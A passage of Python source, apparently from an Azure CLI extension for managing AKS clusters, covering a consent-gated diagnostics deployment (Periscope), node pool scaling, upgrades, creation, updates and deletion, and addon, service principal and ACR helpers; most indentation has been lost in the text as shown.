raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
    print('If you share access to that storage account with Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
# Form containerName from fqdn, as it was previously jsut the location of code is changed.
# https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names
maxContainerNameLength = 63
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_container_name = fqdn.replace('.', '-')
    len_of_container_name = normalized_container_name.find("-hcp-")
if len_of_container_name == -1:
len_of_container_name = maxContainerNameLength
container_name = normalized_container_name[:len_of_container_name]
sas_token = sas_token.strip('?')
deployment_yaml = _read_periscope_yaml()
deployment_yaml = deployment_yaml.replace("# <accountName, string>", storage_account_name)
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <containerName, string>", container_name)
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(container_name)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def _read_periscope_yaml():
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    periscope_yaml_file = os.path.join(curr_dir, "deploymentyaml", "aks-periscope.yaml")
    with open(periscope_yaml_file, "r") as yaml_file:
        data_loaded = yaml_file.read()
    return data_loaded
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the node pool name, or use the "az aks nodepool" command to scale a node pool.')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster " \
"and might take a while. Do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
        # This is only a client-side convenience so customers can run "az aks upgrade" to upgrade all
        # node pools of a cluster; the SDK only supports upgrading a single node pool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. A node-image-only upgrade '
                               'can only be applied to VirtualMachineScaleSets clusters.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name, None)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name, snapshot_id=None):
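    """Trigger a node image version upgrade for a single node pool, passing the
    AKSSnapshotId header when a snapshot_id is supplied.
    """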
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name, headers=headers)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False,
rotation_poll_interval=None,):
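    """Translate the comma-separated addons string into a dict of
    ManagedClusterAddonProfile objects, applying the addon-specific options
    passed on the command line. Raises CLIError for unrecognized addon names.
    """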
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
            # use the default workspace if it exists, otherwise create one
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
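    """Return a service principal for the cluster: reuse one cached in
    aksServicePrincipal.json, create a new one when none is supplied, or
    validate that --client-secret accompanies an explicit --service-principal.
    """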
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
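    """Validate the min-count/max-count/node-count combination and, when the
    cluster autoscaler is enabled, copy the values onto the agent pool profile.
    """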
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
                'Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
                'min-count and max-count can only be used together with --enable-cluster-autoscaler, please specify that flag as well')
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
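    """Resolve the ACR by resource ID or by name across resource groups and
    grant (or, with detach=True, revoke) the acrpull role for the given client ID.
    """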
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
workload_runtime=None,
gpu_instance_profile=None,
snapshot_id=None,
no_wait=False):
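    """Add a new node pool to an existing managed cluster, optionally seeding
    the Kubernetes version, OS type/SKU and VM size defaults from a node pool
    snapshot when snapshot_id is provided.
    """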
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
workload_runtime=workload_runtime,
gpu_instance_profile=gpu_instance_profile,
creation_data=creationData
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,
aks_custom_headers=None,
snapshot_id=None):
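    """Upgrade a node pool's Kubernetes version or, with --node-image-only,
    just its node image; a snapshot can supply the target version.
    """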
if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
max_surge=None,
mode=None,
labels=None,
node_taints=None,
no_wait=False):
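    """Update node pool settings such as the cluster autoscaler configuration,
    tags, mode, labels, taints, scale-down mode and max surge.
    """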
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not scale_down_mode and not mode and not max_surge and labels is None and node_taints is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode" or "--labels" or "--node-taints')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if node_taints is not None:
taints_array = []
if node_taints != '':
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise InvalidArgumentValueError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
instance.node_taints = taints_array
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_stop(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Stopped")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_start(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Running")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_addon_list_available():
available_addons = []
for k, v in ADDONS.items():
available_addons.append({
"name": k,
"description": ADDONS_DESCRIPTIONS[v]
})
return available_addons
def aks_addon_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
